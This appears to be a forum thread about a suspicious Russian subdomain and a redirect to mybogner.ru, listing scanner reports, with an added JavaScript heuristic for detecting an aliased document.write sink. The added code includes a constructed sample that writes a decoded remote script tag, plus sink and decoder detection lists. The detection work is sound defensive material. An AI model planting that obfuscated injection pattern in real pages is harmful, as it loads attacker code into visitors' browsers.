Suspicious JavaScript detected?

See: https://www.virustotal.com/nl/url/03bd9f606fc4354b8e14a71cc6b79d0d9fbb446b633f0a502fe04af4562cf0cd/analysis/1395591870/
Flagged here: http://quttera.com/detailed_report/nitkiozz.hotbox.ru
Detected potentially suspicious initialization of function pointer to JavaScript method document.write __tmpvar140497762 = document.write;
http://fetch.scritch.org/%2Bfetch/?url=http%3A%2F%2Fnitkiozz.hotbox.ru&useragent=Fetch+useragent&accept_encoding=
See: http://sitecheck.sucuri.net/scanner/?scan=http%3A%2F%2Fnitkiozz.hotbox.ru blacklisted for insecure downloads.
See: https://www.mywot.com/en/scorecard/nitkiozz.hotbox.ru
100/100% malicious →
http://zulu.zscaler.com/submission/show/287628eb5eda163ab29bae51867fd431-1395594124

pol
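The Quttera finding quoted above ("initialization of function pointer to JavaScript method document.write", i.e. `__tmpvar140497762 = document.write;`) is a classic obfuscation trick: the sink is copied into a throwaway variable so a scanner looking for the literal string `document.write(` never sees a call. Below is an added example of how a small static heuristic can catch that pattern. It is not Quttera's code, not the script from the infected page, and not part of the original thread; the sample scripts are constructed for this example and the host `example.invalid` is a placeholder.

```javascript
// Added example: heuristic scanner for "sink aliased into a variable, then
// called with a decoded payload". Not Quttera's detector; samples are constructed.

// Sinks whose aliasing is a common evasion: once copied into a variable,
// the sink name no longer appears next to the call.
const SINKS = ['document.writeln', 'document.write', 'window.eval', 'eval', 'Function', 'setTimeout'];

// Decoders that typically turn an encoded blob back into markup or code.
const DECODERS = ['unescape', 'decodeURIComponent', 'String.fromCharCode', 'atob'];

function escapeRegExp(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// Find `alias = <sink>;` assignments, with or without var/let/const.
function findSinkAliases(src) {
  const sinkAlt = SINKS.map(escapeRegExp).join('|');
  const re = new RegExp(
    '(?:\\b(?:var|let|const)\\s+)?([A-Za-z_$][\\w$]*)\\s*=\\s*(' + sinkAlt + ')\\s*(?:;|$)',
    'gm'
  );
  const found = [];
  let m;
  while ((m = re.exec(src)) !== null) {
    found.push({ alias: m[1], sink: m[2] });
  }
  return found;
}

// For each alias, check whether it is actually invoked and whether the call
// argument passes through a decoder or a long %XX run (the strongest signal
// that a hidden payload is being written into the page).
function analyseScript(src) {
  return findSinkAliases(src).map(({ alias, sink }) => {
    const callRe = new RegExp('\\b' + escapeRegExp(alias) + '\\s*\\(([\\s\\S]*?)\\)\\s*;', 'g');
    let invoked = false;
    let decoded = false;
    let m;
    while ((m = callRe.exec(src)) !== null) {
      invoked = true;
      const arg = m[1];
      if (DECODERS.some((d) => arg.includes(d)) || /(?:%[0-9a-fA-F]{2}){8,}/.test(arg)) {
        decoded = true;
      }
    }
    const verdict = decoded ? 'high' : invoked ? 'medium' : 'low';
    return { alias, sink, invoked, decoded, verdict };
  });
}

// Constructed samples (not the live script from the thread).
const SAMPLE_SUSPICIOUS = `
var __tmpvar140497762 = document.write;
__tmpvar140497762(unescape('%3Cscript%20src%3D%22http%3A%2F%2Fexample.invalid%2Fx.js%22%3E%3C%2Fscript%3E'));
`;

const SAMPLE_ALIAS_PLAIN = `
var w = document.write;
w('<b>hello</b>');
`;

const SAMPLE_BENIGN = `
document.write('<p>Last updated: 2014-03-23</p>');
var total = items.length;
`;

console.log(JSON.stringify(analyseScript(SAMPLE_SUSPICIOUS), null, 2));
console.log(JSON.stringify(analyseScript(SAMPLE_ALIAS_PLAIN), null, 2));
console.log(JSON.stringify(analyseScript(SAMPLE_BENIGN), null, 2));
```

The verdicts are deliberately graded: aliasing a sink on its own is only a weak signal (legitimate minified code does it too), aliasing plus a call is worth a look, and aliasing plus a call whose argument is decoded at runtime is what the scanners in this thread are reacting to. A real deployment would run this over every inline and external script the page pulls in, since the redirect chain here spans more than one host.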

VirusTotal
https://www.virustotal.com/en/file/e6e61b39f979299b9bb62886080c6875dcb3f7e636abd53597ceabe3d830d75f/analysis/1395594568/

Not blocked by Avast.

I'm getting redirected to this site: hxxp://mybogner.ru/i/

http://www.siteadvisor.com/sites/mybogner.ru
http://safeweb.norton.com/report/show?url=mybogner.ru
https://www.mywot.com/en/scorecard/mybogner.ru
https://www.virustotal.com/en/url/ed3b916bd8171f9d7bc3d1d9fddf2223e55fbf2b877140928136fb7c255806e5/analysis/1395594730/

Hi Steven Winderlich,

Better not venture out there: https://www.mywot.com/en/scorecard/mybogner.ru?utm_source=addon&utm_content=popup-donuts
I get an IDS alert there for “ET POLICY Maxmind geoip check to /app/geoip.js” → http://urlquery.net/report.php?id=1395595008541
That means infection traffic has been spotted there, which is being used by a trojan.

pol

No big deal inside a virtual machine.

But I wonder why it's not blocked by Avast?

The website has been reported to Avast via mail. :slight_smile:

Hi Steven Winderlich,

Because the main domain is online, but not that particular sub-domain: nitkiozz dot hotbox dot ru.htm
It’s not just you! hxxp://nitkiozz.hotbox.ru.htm looks down from here.
So if that is the situation, no longer online, how would avast! add detection then?
They were simply too late; the other 10 were in time to add protection.

polonus

I also sent them the other website I got redirected to. :slight_smile: